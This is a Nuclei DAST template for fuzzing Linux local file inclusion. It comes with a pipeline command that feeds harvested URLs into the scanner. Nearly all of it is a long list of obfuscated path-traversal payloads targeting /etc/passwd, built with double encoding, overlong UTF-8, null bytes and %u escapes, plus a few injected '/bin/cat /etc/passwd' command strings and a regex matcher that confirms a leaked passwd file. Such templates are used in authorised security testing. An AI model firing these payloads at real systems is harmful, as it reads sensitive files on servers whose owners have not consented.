Linux Fuzz
Improved version from DAST with additional obfuscated payloads, run with : cat urls.txt | gf lfi | nuclei -t linux.yaml -dast
id: linux-lfi-fuzz
info:
name: Local File Inclusion - Linux
author: Redflare
severity: high
reference:
- https://github.com/coffinsp
metadata:
max-request: 5
tags: lfi,dast,linux
http:
- pre-condition:
- type: dsl
dsl:
- 'method == "GET"'
payloads:
nix_fuzz:
- '/etc/passwd'
- '%00/etc/passwd'
- '%00../../../../../../etc/passwd'
- '%00/etc/passwd%00'
- '..%01%25c1%259cetc%25c1%259cpasswd'
- '..%01%%32%%66etc%%32%%66passwd'
- '..%01%c0%afetc%c0%afpasswd'
- '..%01%e0%80%afetc%e0%80%afpasswd'
- '..%01%u2215..%01%u2215etc%u2215passwd'
- '..%01%u2216etc%u2216passwd'
- '..%01%uEFC8etc%uEFC8passwd'
- '%0a/bin/cat%20/etc/passwd'
- '0x2e0x2e/0x2e0x2e/etc/passwd'
- '0x2e0x2e0x2fetc0x2fpasswd'
- '0x2e0x2e0x5cetc0x5cpasswd'
- '0x2e0x2e%25c0%25afetc%25c0%25afpasswd'
- '0x2e0x2e%25c1%259cetc%25c1%259cpasswd'
- '0x2e0x2e%2fetc%2fpasswd'
- '0x2e0x2e%%32%%66etc%%32%%66passwd'
- '0x2e0x2e%%35%%63etc%%35%%63passwd'
- '0x2e0x2e%5cetc%5cpasswd'
- '0x2e0x2e%bg%qfetc%bg%qfpasswd'
- '0x2e0x2e%c0%2fetc%c0%2fpasswd'
- '0x2e0x2e%c0%5cetc%c0%5cpasswd'
- '0x2e0x2e%c0%9vetc%c0%9vpasswd'
- '0x2e0x2e%c0%afetc%c0%afpasswd'
- '0x2e0x2e%c0%qfetc%c0%qfpasswd'
- '0x2e0x2e%c1%1cetc%c1%1cpasswd'
- '0x2e0x2e%c1%8setc%c1%8spasswd'
- '0x2e0x2e%c1%9cetc%c1%9cpasswd'
- '0x2e0x2e%c1%afetc%c1%afpasswd'
- '0x2e0x2e%c1%pcetc%c1%pcpasswd'
- '0x2e0x2e%e0%80%afetc%e0%80%afpasswd'
- '0x2e0x2e/etc/passwd'
- '0x2e0x2e%f0%80%80%afetc%f0%80%80%afpasswd'
- '0x2e0x2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd'
- '0x2e0x2e%u22150x2e0x2e%u2215/etc/passwd'
- '0x2e0x2e%u2215/etc/passwd'
- '0x2e0x2e%u2215etc%u2215passwd'
- '0x2e0x2e%u2216/etc/passwd'
- '0x2e0x2e%u2216etc%u2216passwd'
- '0x2e0x2e%uEFC80x2e0x2e%uEFC8/etc/passwd'
- '0x2e0x2e%uEFC8/etc/passwd'
- '0x2e0x2e%uEFC8etc%uEFC8passwd'
- '0x2e0x2e%uF0250x2e0x2e%uF025/etc/passwd'
- '0x2e0x2e%uF025/etc/passwd'
- '0x2e0x2e%uF025etc%uF025passwd'
- '....//0x2f..../0x2fetc0x2fpasswd'
- '.?0x2fetc0x2fpasswd'
- '....//0x5c..../0x5cetc0x5cpasswd'
- '%252e%252e\%252e%252e\/etc/passwd'
- '%252e%252e%252fetc%252fpasswd'
- '%252e%252e%252fetc%252fpasswd%00'
- '%252e%252e%252f/etc/passwd'
- '%252e%252e%25c1%259c/etc%25c1%259cpasswd'
- '%252e%252e%2fetc%2fpasswd'
- '%252e%252e%5cetc%5cpasswd'
- '%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fetc%c0%2fpasswd'
- '%252e%252e%c0%2f%252e%252e%c0%2f%252e%252e%c0%2fetc%c0%2fpasswd'
- '%252e%252e%c0%2f%252e%252e%c0%2fetc%c0%2fpasswd'
- '%252e%252e%c0%2fetc%c0%2fpasswd'
- '%252e%252e%c0%af/etc%c0%afpasswd'
- '%252e%252e%c1%9c/etc%c1%9cpasswd'
- '%252e%252e//etc/passwd'
- '%252e%252e/etc/passwd'
- '..%252f..%252fetc%252fpasswd'
- '....//%252f..../%252fetc%252fpasswd'
- '.?%252fetc%252fpasswd'
- '....//%255c..../%255cetc%255cpasswd'
- '%25c0%25ae%25c0%25ae0x2fetc0x2fpasswd'
- '%25c0%25ae%25c0%25ae0x5cetc0x5cpasswd'
- '%25c0%25ae%25c0%25ae%252fetc%252fpasswd'
- '%25c0%25ae%25c0%25ae%255cetc%255cpasswd'
- '%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd'
- '%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd'
- '%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd'
- '%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd'
- '%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd'
- '%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd'
- '%25c0%25ae%25c0%25ae\%25c0%25ae%25c0%25ae\/etc/passwd'
- '%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd'
- '%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd'
- '%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd'
- '%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd'
- '%25c0%25ae%25c0%25ae%25c1%259c%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd'
- '%25c0%25ae%25c0%25ae%25c1%259c/etc/passwd'
- '%25c0%25ae%25c0%25ae%2fetc%2fpasswd'
- '%25c0%25ae%25c0%25ae%5cetc%5cpasswd'
- '%25c0%25ae%25c0%25ae%c0%2fetc%c0%2fpasswd'
- '%25c0%25ae%25c0%25ae%c0%5cetc%c0%5cpasswd'
- '%25c0%25ae%25c0%25ae%c0%afetc%c0%afpasswd'
- '%25c0%25ae%25c0%25ae%c1%9cetc%c1%9cpasswd'
- '%25c0%25ae%25c0%25ae%c1%9c/etc/passwd'
- '%25c0%25ae%25c0%25ae%c1%pcetc%c1%pcpasswd'
- '%25c0%25ae%25c0%25ae//etc/passwd'
- '%25c0%25ae%25c0%25ae/etc/passwd'
- '%25c0%25ae%25c0%25ae\/etc/passwd'
- '%25c0%25ae%25c0%25ae\etc\passwd'
- '....//%25c0%25af..../%25c0%25afetc%25c0%25afpasswd'
- '%25c0%25af/etc/passwd'
- '....//%25c1%259c..../%25c1%259cetc%25c1%259cpasswd'
- '%25c1%259c/etc/passwd'
- '%2e%2e%25c0%25afetc%25c0%25afpasswd'
- '%2e%2e%25c1%259cetc%25c1%259cpasswd'
- '/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '%2e%2e/%2e%2e/%2e%2e//etc/passwd'
- '%2e%2e/%2e%2e/etc/passwd'
- '%2e%2e\%2e%2e\/etc/passwd'
- '%2e%2e%2fetc%2fpasswd'
- '%2e%2e%2f/etc/passwd'
- '%2e%2e%%32%%66etc%%32%%66passwd'
- '%2e%2e%%35%%63etc%%35%%63passwd'
- '%2e%2e%5cetc%5cpasswd'
- '%2e%2e%bg%qfetc%bg%qfpasswd'
- '%2e%2e%c0%2fetc%c0%2fpasswd'
- '%2e%2e%c0%5cetc%c0%5cpasswd'
- '%2e%2e%c0%9vetc%c0%9vpasswd'
- '%2e%2e%c0%afetc%c0%afpasswd'
- '%2e%2e%c0%qfetc%c0%qfpasswd'
- '%2e%2e%c1%1cetc%c1%1cpasswd'
- '%2e%2e%c1%8setc%c1%8spasswd'
- '%2e%2e%c1%9cetc%c1%9cpasswd'
- '%2e%2e%c1%afetc%c1%afpasswd'
- '%2e%2e%c1%pcetc%c1%pcpasswd'
- '%2e%2e%e0%80%afetc%e0%80%afpasswd'
- '%2e%2e//etc/passwd'
- '%2e%2e/etc/passwd'
- '%2e%2e%f0%80%80%afetc%f0%80%80%afpasswd'
- '%2e%2e%f8%80%80%80%afetc%f8%80%80%80%afpasswd'
- '%2e%2e%u2215etc%u2215passwd'
- '%2e%2e%u2216etc%u2216passwd'
- '%2e%2e%uEFC8etc%uEFC8passwd'
- '%2e%2e%uF025etc%uF025passwd'
- '%2e%c0%ae%2fetc%2fpasswd'
- '%2e%c0%ae%5cetc%5cpasswd'
- '.%2e/etc/passwd'
- '..%2f..%2fetc%2fpasswd'
- '....//%2f..../%2fetc%2fpasswd'
- '..%2f..%2f/etc/passwd'
- '%%32%%65%%32%%650x2fetc0x2fpasswd'
- '%%32%%65%%32%%650x5cetc0x5cpasswd'
- '%%32%%65%%32%%65%252fetc%252fpasswd'
- '%%32%%65%%32%%65%255cetc%255cpasswd'
- '%%32%%65%%32%%65%2fetc%2fpasswd'
- '%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd'
- '%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd'
- '%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd'
- '%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd'
- '%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd'
- '%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65//etc/passwd'
- '%%32%65%%32%65/%%32%65%%32%65//etc/passwd'
- '`%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%'
- '%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd'
- '%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd'
- '%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd'
- '%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd'
- '%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66/etc/passwd'
- '%%32%65%%32%65%%32%66/etc/passwd'
- '%%32%%65%%32%%65%5cetc%5cpasswd'
- '%%32%%65%%32%%65%bg%qfetc%bg%qfpasswd'
- '%%32%%65%%32%%65%c0%2fetc%c0%2fpasswd'
- '%%32%%65%%32%%65%c0%5cetc%c0%5cpasswd'
- '%%32%%65%%32%%65%c0%afetc%c0%afpasswd'
- '%%32%%65%%32%%65%c1%9cetc%c1%9cpasswd'
- '%%32%%65%%32%%65/etc/passwd'
- '%%32%%65%%32%%65\etc\passwd'
- '%%32%65%%32%65//etc/passwd'
- '%%32%%65%%32%%65%u2215etc%u2215passwd'
- '%%32%%65%%32%%65%u2216etc%u2216passwd'
- '%%32%%65%%32%%65%uEFC8etc%uEFC8passwd'
- '%%32%%65%%32%%65%uF025etc%uF025passwd'
- '..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd'
- '..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd'
- '..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd'
- '..%%32%66..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd'
- '..%%32%66..%%32%66..%%32%66..%%32%66/etc/passwd'
- '..%%32%66..%%32%66..%%32%66/etc/passwd'
- '....//%%32%%66..../%%32%%66etc%%32%%66passwd'
- '..%%32%66..%%32%66/etc/passwd'
- '%%32%%66/etc%%32%%66passwd'
- '..%%32%66/etc/passwd'
- '....//%%35%%63..../%%35%%63etc%%35%%63passwd'
- '/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd'
- '..%5c..%5cetc%5cpasswd'
- '....//%5c..../%5cetc%5cpasswd'
- '%5C../etc/passwd'
- 'AAAAAAAA.../etc/passwd'
- 'AAAAAAAA..\etc\passwd'
- '\\'/bin/cat%20/etc/passwd\\''
- '....//%bg%qf..../%bg%qfetc%bg%qfpasswd'
- '%c0%2e%c0%2e%2fetc%2fpasswd'
- '%c0%2e%c0%2e/etc/passwd'
- '....//%c0%2f..../%c0%2fetc%c0%2fpasswd'
- '....//%c0%5c..../%c0%5cetc%c0%5cpasswd'
- '....//%c0%9v..../%c0%9vetc%c0%9vpasswd'
- '..%c0%ae%2fetc%2fpasswd'
- '%c0%ae%c0%ae%5cetc%5cpasswd'
- '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd'
- '%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00'
- '%c0%ae%c0%ae%c1%9c/etc/passwd'
- '%c0%ae%c0%ae//etc/passwd'
- '/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd'
- '....//%c0%af..../%c0%afetc%c0%afpasswd'
- '%c0%afetc%c0%afpasswd'
- '%c0.%c0.%2fetc%2fpasswd'
- '%c0.%c0.%5cetc%5cpasswd'
- '%c0.%c0./etc/passwd'
- '%c0.%c0.\etc\passwd'
- '....//%c0%qf..../%c0%qfetc%c0%qfpasswd'
- '....//%c1%1c..../%c1%1cetc%c1%1cpasswd'
- '....//%c1%8s..../%c1%8setc%c1%8spasswd'
- '....//%c1%9c..../%c1%9cetc%c1%9cpasswd'
- '....//%c1%af..../%c1%afetc%c1%afpasswd'
- '....//%c1%pc..../%c1%pcetc%c1%pcpasswd'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
- '/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd'
- '%e0%80%ae%e0%80%ae0x2fetc0x2fpasswd'
- '%e0%80%ae%e0%80%ae0x5cetc0x5cpasswd'
- '%e0%80%ae%e0%80%ae%252fetc%252fpasswd'
- '%e0%80%ae%e0%80%ae%255cetc%255cpasswd'
- '%e0%80%ae%e0%80%ae%25c0%25afetc%25c0%25afpasswd'
- '%e0%80%ae%e0%80%ae%25c1%259cetc%25c1%259cpasswd'
- '%e0%80%ae%e0%80%ae%2fetc%2fpasswd'
- '%e0%80%ae%e0%80%ae%%32%%66etc%%32%%66passwd'
- '%e0%80%ae%e0%80%ae%%35%%63etc%%35%%63passwd'
- '%e0%80%ae%e0%80%ae%5cetc%5cpasswd'
- '%e0%80%ae%e0%80%ae%bg%qfetc%bg%qfpasswd'
- '%e0%80%ae%e0%80%ae%c0%2fetc%c0%2fpasswd'
- '%e0%80%ae%e0%80%ae%c0%5cetc%c0%5cpasswd'
- '%e0%80%ae%e0%80%ae%c0%9vetc%c0%9vpasswd'
- '%e0%80%ae%e0%80%ae%c0%afetc%c0%afpasswd'
- '%e0%80%ae%e0%80%ae%c0%qfetc%c0%qfpasswd'
- '%e0%80%ae%e0%80%ae%c1%1cetc%c1%1cpasswd'
- '%e0%80%ae%e0%80%ae%c1%8setc%c1%8spasswd'
- '%e0%80%ae%e0%80%ae%c1%9cetc%c1%9cpasswd'
- '%e0%80%ae%e0%80%ae%c1%afetc%c1%afpasswd'
- '%e0%80%ae%e0%80%ae%c1%pcetc%c1%pcpasswd'
- '%e0%80%ae%e0%80%ae%e0%80%afetc%e0%80%afpasswd'
- '%e0%80%ae%e0%80%ae/etc/passwd'
- '%e0%80%ae%e0%80%ae\etc\passwd'
- '%e0%80%ae%e0%80%ae%f0%80%80%afetc%f0%80%80%afpasswd'
- '%e0%80%ae%e0%80%ae%f8%80%80%80%afetc%f8%80%80%80%afpasswd'
- '%e0%80%ae%e0%80%ae%u2215etc%u2215passwd'
- '%e0%80%ae%e0%80%ae%u2216etc%u2216passwd'
- '%e0%80%ae%e0%80%ae%uEFC8etc%uEFC8passwd'
- '%e0%80%ae%e0%80%ae%uF025etc%uF025passwd'
- '....//%e0%80%af..../%e0%80%afetc%e0%80%afpasswd'
- '..%e0%80%afetc%e0%80%afpasswd'
- '%e0%80%af/etc/passwd'
- '................................................................../etc/passwd'
- '......///etc///passwd'
- '....//....//etc//passwd'
- '....//....//etc/passwd'
- '....//etc//passwd'
- '..../\..../\etc/\passwd'
- '.../etc/passwd'
- '...\etc\passwd'
- '../../../../../../../../../../../../etc/passwd'
- '../../../../../../../../../etc/passwd'
- '../../../../../../../../etc/passwd'
- '../../../../../../../etc/passwd'
- '../../../../../../etc/passwd'
- '../../../../../etc/passwd'
- '../../../../etc/passwd'
- '../../../etc/passwd'
- '../../etc/passwd'
- '..///////..////..//////etc/passwd'
- '..///etc///passwd'
- '..//etc//passwd'
- '../\/etc/\/passwd'
- '../\etc/\passwd'
- '../etc/passwd'
- '..\..\..\..\..\..\..\..\..\..\etc\passwd'
- '..\..\..\..\..\..\etc\passwd'
- '..\..\etc\passwd'
- '..\/\etc\/\passwd'
- '..\/etc\/passwd'
- '..\\\etc\\\passwd'
- '..\\etc\\passwd'
- './../etc/passwd'
- '././././././././etc/passwd'
- './/..//etc//passwd'
- '.?/etc/passwd'
- '.\..\etc\passwd'
- '.\.\.\.\.\.\.\.\.\.\etc\passwd'
- '.\\..\\etc\\passwd'
- '.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd'
- '/../../../../../../../../../../etc/passwd'
- '/../../../../../../../../../../etc/passwd^^'
- '/../../../../etc/passwd'
- '/..\../..\../..\../..\../..\../..\../etc/passwd'
- '/..\etc\passwd'
- '/./././././././././././etc/passwd'
- '///../etc///passwd'
- '/etc/passwd'
- '\../\../etc/\passwd'
- '\../etc\passwd'
- '\..\..\..\..\..\..\..\..\..\..\etc\passwd'
- '\\\../../etc\\\passwd'
- '\\\../etc\\\passwd'
- 'etc/passwd'
- '../../../../../../../../../../../../etc/passwd%00'
- '../../../etc/passwd%00'
- '../../etc/passwd%00'
- '../etc/passwd%00'
- '..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
- '..\etc\passwd%00'
- '\..\..\..\..\..\..\..\..\..\..\etc\passwd%00'
- '/../../../../../../../../../../../etc/passwd%00.html'
- '/../../../../../../../../../../../etc/passwd%00.jpg'
- '../../etc/passwd;index.html'
- '../etc/passwd;index.html'
- '%f0%80%80%afetc%f0%80%80%afpasswd'
- '%f0%80%80%af/etc/passwd'
- '....//%f0%80%80%af..../%f0%80%80%afetc%f0%80%80%afpasswd'
- '%f8%80%80%80%af/etc/passwd'
- '....//%f8%80%80%80%af..../%f8%80%80%80%afetc%f8%80%80%80%afpasswd'
- '%u2215/etc/passwd'
- '....//%u2215..../%u2215etc%u2215passwd'
- '%u2216/etc/passwd'
- '..%u2216..%u2216etc%u2216passwd'
- '....//%u2216..../%u2216etc%u2216passwd'
- '%uEFC8/etc/passwd'
- '....//%uEFC8..../%uEFC8etc%uEFC8passwd'
- '%uF025/etc/passwd'
- '....//%uF025..../%uF025etc%uF025passwd'
- '%uff0e%uff0e%25c0%25afetc%25c0%25afpasswd'
- '%uff0e%uff0e%25c1%259cetc%25c1%259cpasswd'
- '%uff0e%uff0e%%32%%66etc%%32%%66passwd'
- '%uff0e%uff0e%%35%%63etc%%35%%63passwd'
- '%uff0e%uff0e%e0%80%afetc%e0%80%afpasswd'
- '%uff0e%uff0e%f0%80%80%afetc%f0%80%80%afpasswd'
- '%uff0e%uff0e%f8%80%80%80%afetc%f8%80%80%80%afpasswd'
- '%uff0e%uff0e%uF025etc%uF025passwd'
fuzzing:
- part: query
type: replace
mode: multiple
fuzz:
- '{{nix_fuzz}}'
stop-at-first-match: true
matchers:
- type: regex
part: body
regex:
- 'root:.*:0:0:'
Last updated